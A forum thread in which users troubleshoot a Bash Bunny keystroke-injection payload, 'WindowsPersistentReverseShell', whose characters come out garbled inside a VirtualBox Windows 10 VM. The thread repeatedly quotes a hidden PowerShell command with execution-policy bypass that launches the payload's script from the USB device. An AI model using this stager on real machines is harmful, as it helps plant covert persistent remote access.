heartbleed Posted May 25, 2020 Share Posted May 25, 2020 Hello all, I am having some trouble with my bashbunny on windows 10 VirtualBox VM. When I use a WindowsPersistentReverseShell payload, the output on run.exe is not right: LED ATTACK RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" LED FINISH The output should be: Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\run.ps1') But this is how it appears on my Windows 10 VM: Powershell -nop -ex Bypass -w Hidden .((gwmi win32_VOLUME _F "LABE""BSHBUNNY""">NAM+"PAYOADS|SWITCH!|RUN>PS!") I'm using virtual box 6.1.8 r137981 (Qt5.6.2), USB 3.0 driver, Windows 10 and bashbunny US language. When I test this payload on my windows 10 machine (not vm) everything goes perfect. I also read in some old forums about slowing down keystrokes in RubbeDucky Strings because of VM buffer issues: I think this is the problem, but the String_Delay that solves the problem on RubberDucky doesn't work in BashBunny, or I am not using this correctly. Does anybody know how to solve this issue? Link to comment Share on other sites More sharing options...
Bob123 Posted May 25, 2020 Share Posted May 25, 2020 The string you have above is quite large to pick apart character by character. I do see several that are missing or capitalized. Is this the real output you get from your vm or are there a few mistakes when this was typed in? It's hard to troubleshoot when I'm not sure what's at fault here. Not faulting you, I just want to make sure I know for sure that what you have above is the exact output and not a typing issue. I mean is your output really LABE and NAM??? You could use the Q DELAY or QUACK DELAY command to delay an entire line or even parts of a line if you are somehow missing characters every now and then. I'd put a QUACK DELAY 1000 right above this line and see if it helps at all. Or put one mid way through and see if that helps a bit. I'll see if I can get the same result on mine. Link to comment Share on other sites More sharing options...
Bob123 Posted May 26, 2020 Share Posted May 26, 2020 Well I have a win10 vm in vmware and got it all to work without issue. I'll try virtualbox but it might take a bit longer since I'll have to make the VMs for it Link to comment Share on other sites More sharing options...
heartbleed Posted May 26, 2020 Author Share Posted May 26, 2020 On 5/25/2020 at 8:22 PM, Bob123 said: The string you have above is quite large to pick apart character by character. I do see several that are missing or capitalized. Is this the real output you get from your vm or are there a few mistakes when this was typed in? It's hard to troubleshoot when I'm not sure what's at fault here. Not faulting you, I just want to make sure I know for sure that what you have above is the exact output and not a typing issue. I mean is your output really LABE and NAM??? You could use the Q DELAY or QUACK DELAY command to delay an entire line or even parts of a line if you are somehow missing characters every now and then. I'd put a QUACK DELAY 1000 right above this line and see if it helps at all. Or put one mid way through and see if that helps a bit. I'll see if I can get the same result on mine. Yes, this is the real output, and it changes somehow everytime I use my bashbunny again, like the photo. You can see that the word "NAME" was NAM before, and now is "AME". I started to break the string in peaces, to see if the end of the string would become 100% ok, look: Command on PC: RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" Output 100% OK: Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\run.ps1') Now on VM you will see that the output will become better each time I reduce the string (green part is ok, red is wrong. The commands are broken, but I made this just to test the output). Command: RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" Output: Powershell -nop -ex Bypass -w Hidden .((gwmi win32_VOLUME _F "LABE""BSHBUNNY""">NAM+"PAYOADS|SWITCH!|RUN>PS!") Command: RUN WIN Powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" Output: Powershell .((gwmi win32_volume -f 'label=''BASHBNNY""")NME+"PAYLOADS|SWITCH!|RUN>PS!") Command: RUN WIN Powershell ".(('label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" Output: Powershell .(('label=''BashBunny''').NME+PAYLOAS|SWITCH!|RUN>PS!") So as you can see, the smaller the string is, it reaches the end better, but still with output error, and a kind of random error, as shown in the picture. I am very convinced that this is a VM buffer problem. I've tried QUAK DELAY before the command, no progress... I think the real solution would be something like the String_Delay as shown in the old topic on my first post, but I need something like it for BashBunny. Link to comment Share on other sites More sharing options...
Bob123 Posted May 27, 2020 Share Posted May 27, 2020 That is so weird. Well I set everything up on my laptop and I need to see how to make USB work better (or even work to begin with) in virtualbox. Works like a champ in vmware. I may have to resort to my desktop so I'll let you know if I have any luck. But with vmware I had zero issues. As far as length I didn't have to modify the payload, however I noticed that sometimes the switch tag doesn't always work so I just hard coded it. Link to comment Share on other sites More sharing options...
heartbleed Posted May 27, 2020 Author Share Posted May 27, 2020 I will try with Vmware. For Virtualbox you have to download a windows 10 developer VM, and after you download virtual box and virtual box extension pack to enable USB 3.0 and thats it! If you can do it, I will try vmware and we both can double check this problem. Link to comment Share on other sites More sharing options...
heartbleed Posted May 27, 2020 Author Share Posted May 27, 2020 Bob, I tested with VMware and it really works! Conclusion: There's something wrong with VirtualBox USB driver, Vmware works 100%! Thank you, I wouldn't try Vmware without your support! If you get the same conclusion about VirtualBox please tell me so I will know if the problem happens only with me. Link to comment Share on other sites More sharing options...
Bob123 Posted May 27, 2020 Share Posted May 27, 2020 OblivionX thanks for your kind words. It's nice to know that I can help out every now and then. And thanks for the reminder on the extension pack. I had a n00b moment...comes with old age! Ok so virtualbox at the same level as yours, extension pack the same as yours. Only difference is my laptop is older so I'm only using USB 2.0. I downloaded MS's Edge Win10 VM and made my own Win 10 VM and both worked fine. You mentioned the win 10 developer vm which I think is that 20ish Gig vm. I'm downloading that now and will give it a go. Depending on the results of that, maybe try the 2.0 USB option rather than 3.0? I'll let you know what I find. I think I may still try all this on my desktop since it has USB 3.0. Cause I really want to see it screw up! Actually I'll see what happens if I try the USB 3.0 options on my laptop and see if that makes a difference. Thanks. Link to comment Share on other sites More sharing options...
heartbleed Posted May 27, 2020 Author Share Posted May 27, 2020 Bob123, you really helped me! I spent some time to know that I would have to use extension pack too, so I had a n00b momento too =). I tried Usb 2.0 with no success... Maybe my RAM/Processor speed is somehow fast enought for bunny? I am using Nvme too, so idk if this can change something for the VM speed....If you have success with the same VM (20 gig) and 3.0, the problem is not VirtualBox driver, it will be something else that I don't know.... Link to comment Share on other sites More sharing options...
Bob123 Posted May 27, 2020 Share Posted May 27, 2020 Welp I couldn't replicate the issue. I downloaded the dev win10 vm, set it to usb3 and plugged in the bunny and the payload worked. My laptop is older though. It's a second gen i5 but it's hanging in there. I'll try it on my desktop which actually has usb3 ports on it and I'll see what that one does. I wouldn't think it'd be cpu, ram, or hd. Maybe a motherboard driver? Link to comment Share on other sites More sharing options...
Bob123 Posted May 28, 2020 Share Posted May 28, 2020 I did the same tests on my desktop today with USB3 only and everything seemed to work fine. Guessing a driver issue or maybe it is some sort of hardware issue. Let me know if you end up trying anything else. Link to comment Share on other sites More sharing options...
heartbleed Posted May 28, 2020 Author Share Posted May 28, 2020 Hi Bob! It seems that this is a hardware issue.... I didn't try anything else, I think we tried everything about this, but the good thing is that my Vmware VM works! Thanks again for the support, and now we can close this topic! 😄 Link to comment Share on other sites More sharing options...
FiLa Posted March 5, 2022 Share Posted March 5, 2022 Hello, i have the same issue. My output in win10 is: Powershell -nop -ex Bypass -w Hidden .((gwmi win32_volume -f `label=``BashBunny```).Name+`payloadsswitch2run.ps1`) i have CZ language. Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 5, 2022 Share Posted March 5, 2022 Are you using cz as DUCKY_LANG? Are the back ticks intentional? Those chars should be single quotes. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.